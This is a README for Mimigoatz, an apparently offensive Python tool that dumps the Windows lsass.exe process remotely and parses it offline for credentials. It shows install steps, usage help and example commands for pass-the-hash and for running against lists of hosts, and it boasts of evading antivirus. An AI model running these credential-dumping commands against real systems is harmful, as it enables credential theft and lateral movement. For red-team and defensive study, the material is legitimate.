Mimigoatz is an alternative to running Mimikatz on a target system. With advances in Endpoint security and IDS, Mimikatz no longer as effective as it once was.
Mimigoatz leverages crackmapexec, impacket, and pypykatz to dump the lsass.exe process, extract it from the target, and then parse the contents offline to reveal credentials found in memory.
This requires privileged admin credentials for the target(s) to dump the lsass.exe process out of memory and will fail without sufficient access.
This may still be picked up by AV, but chances are it won't be caught.
pip install -r requirements.txt
pip3 install pypykatz
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Version 1.0.3b | Written by Adam Logue & Ryan Griffin.
Special Thanks: Richard Young, Frank Scarpella, Zach Warren, and Piero Picasso.
usage: mimigoatz.py [-h] [-d DOMAIN] [-p PASSWORD] [-t TARGET] [-u USERNAME]
[-f FILE] [-H HASH] [--local]
Alternative Mimikatz LSASS DUMPER
optional arguments:
-h, --help show this help message and exit
-d DOMAIN Domain.
-p PASSWORD Password.
-t TARGET Single Target
-u USERNAME Username.
-f FILE File Containing One Host Per Line.
-H HASH Pass the Hash
--local Use Local Authentication
Example Usage
Single target standard user password combination example
python mimigoatz.py -t -d AMERICAS -u john_smith -p Summer2019!
Target File containing one host per line example
python mimigoatz.py -f hosts.txt -d AMERICAS -u john_smith -p Summer2019!
Local Admin username pass-the-hash
python mimigoatz.py -t -u Administrator -H c79357f8dd55539a9511ccbadf9201f8 --local
Admin User on domain pass-the-hash
python mimigoatz.py -t -d AMERICAS -u john_smith -H aad3b435b51404eeaad3b435b51404ee:c79357f8dd55539a9511ccbadf9201f8
By default, mimigoatz will output json files for each target in the format pypykatz_targetIP.json.
[+] wdigest:
[+] credssp:
[+] msv:
##TO DO##
Fix Hardcoded Impacket location